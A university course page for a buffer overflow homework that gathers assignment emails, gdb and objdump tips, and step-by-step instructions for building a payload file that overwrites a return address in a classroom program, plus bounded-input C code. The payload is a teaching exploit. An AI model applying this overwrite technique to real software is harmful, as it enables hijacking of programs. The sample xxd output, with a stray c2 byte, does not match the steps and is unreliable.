Buffer overflow attack
Unlike all of the other assignments, the information about HW13 was sent entirely by email. Text from those emails is copied below, for convenience.
Requirements
HW13. For HW13, please submit three files: input.txt, boa.c, boa (executable). Most likely, we will only look at input.txt. Running ./boa < input.txt should cause it to call scare_visitor(..), and thus print "BRAH!!!". First, follow along with the instructions in Dr. Kak's article using his example. Then apply the same principle to the boa.c example we have used in class. (Run 264get hw13 to get it.)
This hasn't been posted yet, but that's all there is to it.
How much work is this?
Time-wise, my general estimate would be about 2 hours reading Dr. Kak's notes (assigned 12/2), 1-2 hours reading the two short articles sent yesterday, 30 mins on exercise #1, and 1-2 hours on HW13 (due this Sat 12/12).
Required readings
Please read pages 6 to 43 of Prof. Kak's notes on buffer overflow attacks by Tue 12/8. You can skim the case studies on pages 8-14, but make sure you understand the basic idea of what went wrong. You should come away understanding why buffer overflows are such a treacherous kind of bug, how they work, how they could be exploited by malicious attackers, and how you can write secure code that resists such attacks.
Please read the following for class tomorrow (12/10/2015). This is ≈7 pages in total.
- Understanding C by learning assembly (required, except for the part on static local variables)
- Introduction to x64 assembly language (required, except for the part about directives on the left side of page 2)
More information
Backtrace. The addresses listed by gdb in the backtrace (e.g., 0x400558 and 0x4005f8) are for the next instruction to be executed in those functions, not the beginning of those functions. main() begins at 0x4005d8. greet_visitor() begins at 0x400554. You will also find the address 0x400470, which is for _start(), a part of the "load system" that calls your main function.
From class. Here are a few things I referred to in class yesterday (Tue 12/8):
- Stack frame layout on x86-64 (optional; read only if you find it necessary to understand) – explains x64 stack frame in the context of explaining how registers are used to optimize argument passing in a function call
- To compile without optimizations or debugging symbols (needed for gdb):
/usr/bin/gcc boa.c -o boa -O0 # that's "minus capital-letter-O digit-zero"
The -O0 turns off all optimizations so that the generated instructions will more closely match our C code. Calling gcc as /usr/bin/gcc sidesteps our usual alias, which adds the debugging symbols (needed for gdb). Actually, this would probably work even with the debugging symbols, so just the -O0 is probably acceptable.
- "AMD64" is also known as "x64" and "x86-64". They are synonyms for the same CPU architecture.
- The stack grows down on AMD64. That means the address of the local variables of a callee will be less than the address of the caller's local variables.
- The stack pointer gives the memory address of the "end" of the stack. Thus, with each function call, the system subtracts from the stack pointer.
- gdb commands (Many of these only work while the program is running, i.e., while stopped for a breakpoint.)
- info registers
- info proc mappings
- x/128bx $sp # display 128 bytes of the stack, starting at the end (stack pointer)
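To see the "stack grows down" point for yourself, here is a minimal sketch. It is not part of boa.c; the function names callee() and stack_grows_down() are made up for illustration, and the noinline attribute assumes gcc or clang.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper (not from boa.c): reports the address of one of its
 * own local variables. noinline (a gcc/clang attribute) keeps the compiler
 * from merging this function into its caller. */
__attribute__((noinline))
static void callee(uintptr_t *out) {
    volatile char local = 0;
    *out = (uintptr_t)&local;
}

/* Returns 1 if the callee's local variable sits at a lower address than
 * the caller's local variable, i.e., the stack grew down across the call. */
int stack_grows_down(void) {
    volatile char caller_local = 0;
    uintptr_t callee_addr = 0;

    callee(&callee_addr);

    printf("caller local: %p\n", (void *)&caller_local);
    printf("callee local: %p\n", (void *)callee_addr);

    return callee_addr < (uintptr_t)&caller_local;
}
```

Call stack_grows_down() from your own main(). On AMD64 Linux it should return 1. The exact addresses printed will vary from run to run.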
(optional) For those who are curious. If you wish to play with the boa program in gdb before tomorrow, you might also find the following useful:
- gdb commands
- disassemble greet_visitor # shows the assembly instructions for greet_visitor()
- disassemble main # shows the assembly instructions for main()
- stepi (si) and nexti (ni) are just like step (s) and next (n) except that they step by assembly instructions instead of C code lines
- View assembly instructions for any binary executable
- objdump -S --disassemble boa # convert the binary code back to assembly and display on the command line
- Dig around to find your main() and greet_visitor() or whatever you are looking for. Never mind the rest.
- Have gcc output assembly instructions instead of a binary executable
- /usr/bin/gcc boa.c -O0 -S -o boa.s # -S tells it to output assembly; .s is an extension for assembly files
- Running objdump on an existing binary has the advantage that it tells you the instruction addresses
What you need to know
Things you need to know from this week
- What happens under the hood when we call a function in C?
- What is the overall process?
- What happens with the stack?
- What is the role of the registers?
- rip – aka $pc, instruction pointer, program counter, IP, PC
- rsp – aka $sp, stack pointer
- rbp – aka base pointer, frame pointer
- general purpose – e.g., rdi, rsi, rdx, rcx, r8, …, r15
- What happens in the prologue and epilogue of a function?
- How are assembly instructions different from C code?
- What kinds of operations do assembly instructions do?
- What do the following categories of instructions do?
- jump, call, return, arithmetic, push, pop, move
- How do buffer overflow/overread attacks work?
- How does an attacker perpetrate an attack?
- simple buffer overflow
- simple buffer overread
- What is the role of a debugger (i.e., gdb)?
- How can you write C code that is resistant to such attacks?
- ... only as these apply to the x64 (aka AMD64, x86-64) architecture
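On the last question above, one common defensive habit is to always tell the input routine how big the buffer is. The following is a minimal sketch of that idea using fgets(). The name read_line_bounded() is hypothetical, and this is not a description of how boa.c reads its input.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: reads one line from `in` into `buf`, never writing
 * more than `size` bytes (including the terminating '\0').
 * `size` is assumed to fit in an int.
 * Returns the number of characters stored, or -1 on EOF or error. */
int read_line_bounded(FILE *in, char *buf, size_t size) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL) {
        return -1;
    }

    size_t len = strcspn(buf, "\n");   /* index of '\n', or of '\0' if none */
    if (buf[len] == '\n') {
        buf[len] = '\0';               /* strip the trailing newline */
    } else {
        /* The line was longer than the buffer. Discard the rest of it so
         * that it is not mistaken for the next line. */
        int ch;
        while ((ch = fgetc(in)) != '\n' && ch != EOF) {
            /* nothing to do */
        }
    }
    return (int)len;
}
```

With an 8-byte buffer, a 32-character line is truncated to 7 characters plus '\0'. Nothing past the end of the buffer is written, so the saved return address is never touched.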
Things you do NOT need to know (yet)
- syntax of any specific instruction
- size of particular registers
- how to write programs in assembly language
- directives (.intel_syntax)
- any architecture other than AMD64 on Linux
Q&A
- Can you give an illustration of how function calls work?
I made this example:
https://engineering.purdue.edu/ece264/15au/static/stack_example.pdf
Some of the details in the stack frame for main() seem to contradict my understanding of the x64 calling conventions. I suspect main() may be a special case, since it gets called by the load system. At any rate, your task for HW13 is not related to main() so it shouldn't be an issue. You can see anything in that example for yourself by simply creating breakpoints and using the commands discussed in class (and given in the earlier email).
- How do I create the input.txt file?
This was posted on Blackboard:
Recommended method: vim -b and Ctrl-v x ░ ░
Here's the method I showed in class. I find this the easiest. In this example, I'll show how to create the string used in Dr. Kak's notes (page 42).
- Open a file called input.txt in vim, in binary mode.
vim -b input.txt
- Press i to start inserting characters.
- Press A 24 times to enter "AAAAAAAAAAAAAAAAAAAAAAAA".
- Press Ctrl-v x 8 e to enter the character 0x8e.
- Press Ctrl-v x 0 6 to enter the character 0x06.
- Press Ctrl-v x 4 0 to enter the character 0x40.
- Press Ctrl-v x 0 0 to enter the character 0x00.
Alternative method: xxd -r
If you don't like that method, another option is to create a hex dump in the format of xxd, and then use xxd -r to convert it, redirecting the output to input.txt.
- Open a file called input.hexdump in vim
vim -b input.hexdump
- Enter the following:
0000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
0000010: 41 41 41 41 41 41 41 41 8e 06 40 00
- Use xxd -r to reverse it and create your input.txt.
xxd -r input.hexdump > input.txt
Either way you should end up with a file called input.txt that, when viewed with xxd -g1, contains the following:
0000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0000010: 41 41 41 41 41 41 41 41 c2 8e 06 40 00 0a AAAAAAAA...@..
I hope that helps.
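A third option, not from the original emails, is to generate the file with a few lines of C. This is only a sketch. The name write_payload() is hypothetical, and the padding length (24) and address (0x40068e) in the usage note are the ones from Dr. Kak's example above, not the values for boa. The address bytes are written least significant byte first because x86-64 is little-endian, which is why 0x40068e appears in the file as 8e 06 40 00.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: writes `pad_len` filler bytes ('A') followed by the
 * low `addr_len` bytes of `addr`, least significant byte first.
 * Returns 0 on success, -1 on failure. */
int write_payload(const char *path, size_t pad_len,
                  uint64_t addr, size_t addr_len) {
    FILE *out = fopen(path, "wb");      /* "b": write the bytes untranslated */
    if (out == NULL) {
        return -1;
    }

    int ok = 1;
    for (size_t i = 0; i < pad_len && ok; i++) {
        ok = (fputc('A', out) != EOF);
    }
    for (size_t i = 0; i < addr_len && i < sizeof addr && ok; i++) {
        unsigned char byte = (unsigned char)(addr >> (8 * i));
        ok = (fputc(byte, out) != EOF);
    }

    if (fclose(out) != 0) {
        ok = 0;
    }
    return ok ? 0 : -1;
}
```

For Dr. Kak's example, write_payload("input.txt", 24, 0x40068e, 4) writes 24 bytes of 0x41 followed by 8e 06 40 00, which you can check with xxd -g1 input.txt. For boa, you would still need to find the right padding length and target address yourself with gdb.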